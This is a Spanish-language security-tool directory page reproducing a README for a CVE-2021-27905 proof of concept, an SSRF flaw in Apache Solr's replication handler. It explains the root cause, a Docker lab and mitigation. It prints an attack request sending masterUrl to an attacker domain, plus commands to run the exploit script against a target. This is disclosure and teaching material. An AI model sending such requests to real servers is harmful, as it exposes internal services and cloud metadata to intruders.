Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-27905 — Apache Solr < 8.8.2 Server Side Request Forgery | Kitploit
Herramientas/GitHubGitHub/rizzziom/cve-2021-27905
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubrizzziom/cve-2021-27905

CVE-2021-27905

Apache Solr < 8.8.2 Server Side Request Forgery

Ver Repositorio
2hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2021-27905

No.Título
1Resumen
2Causa raíz
3Prueba de concepto
4Mitigación (8.8.2+)
5Referencia

Para fines educativos y de investigación únicamente. No utilices este código en sistemas que no poseas o para los que no tengas permiso explícito de prueba. No soy responsable de ningún uso indebido.

Resumen

Esta es una vulnerabilidad de Server Side Request Forgery (SSRF) que afecta a Apache Solr (< 8.8.2) y que permite a atacantes remotos realizar peticiones HTTP arbitrarias a sistemas internos o externos a través del parámetro masterUrl del manejador de replicación, exponiendo potencialmente servicios internos o metadatos confidenciales de la nube.

Versiones afectadas : todas las versiones anteriores a 8.8.2 (7.0.0 - 7.7.3, 8.0.0 - 8.8.1)

Causa raíz

El mecanismo de replicación en Solr permite que una «réplica» obtenga archivos de índice de un «maestro/líder» especificando un parámetro masterUrl o leaderUrl. La URL a la que apunta este parámetro no se valida correctamente en las versiones afectadas de Apache Solr. Por lo tanto, permitiría a los atacantes convencer al servidor de que acceda a un recurso remoto que ellos elijan.

Flujo vulnerable

  • Un atacante enviaría una solicitud a un endpoint como:
root@kitploit:~
/solr/<CORE_NAME>/replication?command=fetchindex&masterUrl=http://<ATTACKER_DOMAIN>

El ReplicationHandler de Solr:

  1. Aceptaría la solicitud.
  2. Usaría la masterUrl proporcionada para descargar los datos del índice.
  3. Internamente haría una llamada HTTP a esa dirección.

Prueba de concepto

CONFIGURACIÓN DEL LABORATORIO

  • Se puede configurar un laboratorio localmente con docker:
root@kitploit:~
$ cd lab
$ docker compose up -d

# verify accessibility
$ curl http://127.0.0.1:8983/solr
  • Limpieza
root@kitploit:~
$ docker compose down

EXPLOTACIÓN

  • Configurar un entorno virtual:
root@kitploit:~
# for windows
$ python -m venv <NAME>
$ .\<NAME>\Scripts\activate
# for linux
$ python3 -m venv <NAME>
$ source ./<NAME>/scripts/activate
  • Instalar los requisitos:
root@kitploit:~
$ pip install -r requirements.txt
  • Ejecutar cve-2021-27905.py
root@kitploit:~
$ python3 cve-2021-27905.py --target <TARGET> --payload <SSRF_PAYLOAD>

SSRF PoC

Mitigación (8.8.2+)

El ReplicationHandler de Solr fue parcheado para:

  • Validar que masterUrl/leaderUrl apunte solo a hosts aprobados.
  • Restringir los esquemas de URL aceptados (solo http, https).
  • Endurecer las funciones de streaming remoto.
  • Recomendar a los administradores proteger /replication con autenticación o eliminarlo por completo si no se usa.

Referencia

  • https://nvd.nist.gov/vuln/detail/CVE-2021-27905
  • https://lists.apache.org/thread/90kct018gfdnvh9wh5xvt0grm9jk2l80

Descargar herramienta